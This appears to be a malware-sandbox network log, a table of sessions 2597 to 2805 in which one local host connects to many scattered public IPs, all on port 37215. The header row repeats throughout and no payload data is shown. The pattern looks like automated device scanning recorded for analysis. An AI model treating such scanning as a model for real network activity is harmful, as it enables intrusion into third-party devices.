                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2597192.168.2.1348622197.32.74.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2598192.168.2.1356984104.92.143.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2599192.168.2.134494841.213.21.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2600192.168.2.135440241.22.85.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2601192.168.2.134675025.92.2.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2602192.168.2.1343090157.188.1.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2603192.168.2.1340310211.236.138.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2604192.168.2.1338310117.192.54.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2605192.168.2.135949660.11.178.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2606192.168.2.136019049.157.80.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2607192.168.2.133745823.4.165.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2608192.168.2.133818873.230.192.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2609192.168.2.133555441.134.48.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2610192.168.2.1360198157.183.86.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2611192.168.2.135408441.82.38.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2612192.168.2.133316841.1.199.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2613192.168.2.1343932197.55.67.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2614192.168.2.135478641.100.247.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2615192.168.2.1340908104.77.94.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2616192.168.2.133509841.109.172.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2617192.168.2.1355038145.133.89.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2618192.168.2.1335364157.174.227.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2619192.168.2.133321441.185.61.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2620192.168.2.1352088197.230.169.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2621192.168.2.135467241.95.217.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2622192.168.2.1341964157.24.107.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2623192.168.2.135598041.31.21.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2624192.168.2.1356886157.146.252.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2625192.168.2.134260641.8.3.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2626192.168.2.1341810192.213.133.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2627192.168.2.1343720157.181.170.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2628192.168.2.1345270157.248.96.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2629192.168.2.1334818157.37.124.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2630192.168.2.1335892213.146.139.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2631192.168.2.1343800197.211.166.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2632192.168.2.1339282157.199.129.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2633192.168.2.133878441.187.83.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2634192.168.2.133623443.121.74.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2635192.168.2.133726877.31.131.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2636192.168.2.1349160157.162.134.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2637192.168.2.134863441.51.147.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2638192.168.2.1335002197.25.164.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2639192.168.2.1357034157.115.236.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2640192.168.2.1358266157.8.48.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2641192.168.2.1352098197.151.250.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2642192.168.2.1356050157.143.159.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2643192.168.2.133463283.145.34.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2644192.168.2.1349626157.192.225.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2645192.168.2.1351412197.127.183.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2646192.168.2.1356416197.65.85.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2647192.168.2.135693041.27.30.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2648192.168.2.1355604212.26.186.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2649192.168.2.1337494157.207.180.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2650192.168.2.135571477.157.48.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2651192.168.2.1353656194.95.63.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2652192.168.2.133475460.222.249.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2653192.168.2.1334256197.172.128.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2654192.168.2.1335142197.131.26.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2655192.168.2.1339496191.83.150.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2656192.168.2.1357560197.164.84.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2657192.168.2.1340214157.105.112.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2658192.168.2.1351974157.123.156.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2659192.168.2.1350336125.123.254.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2660192.168.2.1345644157.237.3.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2661192.168.2.1350918157.233.138.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2662192.168.2.1359044197.22.145.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2663192.168.2.135044241.93.65.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2664192.168.2.134254841.134.209.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2665192.168.2.134131641.86.91.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2666192.168.2.135875041.53.85.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2667192.168.2.133372461.103.8.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2668192.168.2.1333620157.46.22.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2669192.168.2.1339992157.152.245.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2670192.168.2.134672441.95.78.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2671192.168.2.1356600157.169.88.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2672192.168.2.1335964197.186.251.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2673192.168.2.1356962101.28.86.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2674192.168.2.135771841.72.45.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2675192.168.2.1354394197.215.69.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2676192.168.2.1351424157.91.198.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2677192.168.2.1347712139.40.153.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2678192.168.2.1356262219.27.193.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2679192.168.2.134269241.93.118.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2680192.168.2.1351296157.85.129.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2681192.168.2.1360884157.84.79.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2682192.168.2.1359592197.198.122.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2683192.168.2.13494201.116.49.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2684192.168.2.1352832197.76.151.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2685192.168.2.135088241.232.27.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2686192.168.2.1351120157.88.19.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2687192.168.2.135106241.184.152.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2688192.168.2.133590041.172.251.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2689192.168.2.1344622157.216.141.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2690192.168.2.1343224120.239.43.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2691192.168.2.1339754197.234.81.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2692192.168.2.1333494211.15.57.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2693192.168.2.1357860157.250.24.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2694192.168.2.1344154197.187.25.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2695192.168.2.1353864157.219.102.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2696192.168.2.1345572197.54.25.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2697192.168.2.133921841.59.98.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2698192.168.2.1333488223.123.120.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2699192.168.2.1355734197.52.31.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2700192.168.2.135092427.251.88.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2701192.168.2.133561827.111.114.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2702192.168.2.1350012197.107.96.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2703192.168.2.1351006157.1.118.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2704192.168.2.1348314157.119.137.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2705192.168.2.1359218197.18.244.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2706192.168.2.135434441.123.196.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2707192.168.2.134169241.236.199.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2708192.168.2.134872241.228.121.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2709192.168.2.133482041.226.172.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2710192.168.2.1352976197.116.61.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2711192.168.2.1349590197.239.186.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2712192.168.2.1342092135.229.75.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2713192.168.2.1348080157.12.35.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2714192.168.2.133853459.62.233.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2715192.168.2.1342714157.109.56.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2716192.168.2.135397841.11.16.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2717192.168.2.1339110110.77.191.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2718192.168.2.134572441.243.4.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2719192.168.2.1356806134.42.229.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2720192.168.2.1358476132.229.85.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2721192.168.2.1338204197.230.94.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2722192.168.2.134926634.243.239.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2723192.168.2.1338722157.98.157.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2724192.168.2.1337942197.159.175.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2725192.168.2.1347866197.18.76.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2726192.168.2.1340922197.239.223.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2727192.168.2.1334606157.173.52.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2728192.168.2.1333044157.20.33.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2729192.168.2.1351216197.107.175.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2730192.168.2.1351656157.38.240.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2731192.168.2.1347918157.104.99.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2732192.168.2.1337950157.206.209.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2733192.168.2.133847241.152.22.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2734192.168.2.1353744157.41.35.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2735192.168.2.1350160197.228.81.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2736192.168.2.134959241.2.227.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2737192.168.2.1353022118.227.68.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2738192.168.2.1358194197.184.189.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2739192.168.2.134739441.80.5.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2740192.168.2.135410042.130.33.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2741192.168.2.1341062197.166.140.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2742192.168.2.1356800157.116.22.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2743192.168.2.1343310157.76.62.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2744192.168.2.1355102197.46.124.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2745192.168.2.1333472157.42.139.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2746192.168.2.134557241.186.214.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2747192.168.2.1338578197.1.172.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2748192.168.2.1355152157.10.211.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2749192.168.2.1355512182.106.166.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2750192.168.2.1348236157.166.254.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2751192.168.2.1340074197.190.169.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2752192.168.2.133572627.148.157.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2753192.168.2.1347236166.69.57.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2754192.168.2.1360106197.23.218.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2755192.168.2.134595639.165.219.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2756192.168.2.1358056163.224.144.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2757192.168.2.1360558197.168.165.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2758192.168.2.1344496197.98.53.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2759192.168.2.134002658.245.185.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2760192.168.2.135698642.164.181.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2761192.168.2.1343792157.23.8.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2762192.168.2.135175841.254.206.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2763192.168.2.1333698157.141.165.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2764192.168.2.135927641.176.66.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2765192.168.2.1337388197.135.85.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2766192.168.2.1345860112.111.21.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2767192.168.2.1345248157.200.34.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2768192.168.2.1333564197.39.178.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2769192.168.2.1347572121.223.27.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2770192.168.2.1353368157.81.243.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2771192.168.2.1349872157.199.211.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2772192.168.2.1337048197.199.52.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2773192.168.2.1349762197.136.186.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2774192.168.2.1354816197.155.3.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2775192.168.2.1358914183.50.251.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2776192.168.2.1352486157.70.10.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2777192.168.2.1349960197.158.11.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2778192.168.2.135926241.240.189.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2779192.168.2.1334914157.49.48.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2780192.168.2.133468241.192.157.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2781192.168.2.135655841.204.159.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2782192.168.2.133746841.74.30.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2783192.168.2.1353030197.187.7.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2784192.168.2.1356722157.147.68.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2785192.168.2.1336866157.140.146.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2786192.168.2.1358948157.115.55.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2787192.168.2.134942841.229.153.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2788192.168.2.134120041.101.213.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2789192.168.2.1337900197.6.125.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2790192.168.2.135541441.49.115.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2791192.168.2.135889241.38.237.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2792192.168.2.1351936197.23.212.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2793192.168.2.1356136124.124.61.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2794192.168.2.1341934197.246.59.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2795192.168.2.1355460197.94.159.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2796192.168.2.1354342157.85.21.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2797192.168.2.1336530157.9.71.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2798192.168.2.1335754157.90.244.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2799192.168.2.13543784.38.109.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2800192.168.2.1356672157.64.133.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2801192.168.2.1346904197.132.155.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2802192.168.2.1338640197.201.210.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2803192.168.2.1339526157.174.149.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2804192.168.2.134601487.110.41.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2805192.168.2.1341158157.195.232.8737215
                                                  TimestampBytes transferredDirectionData


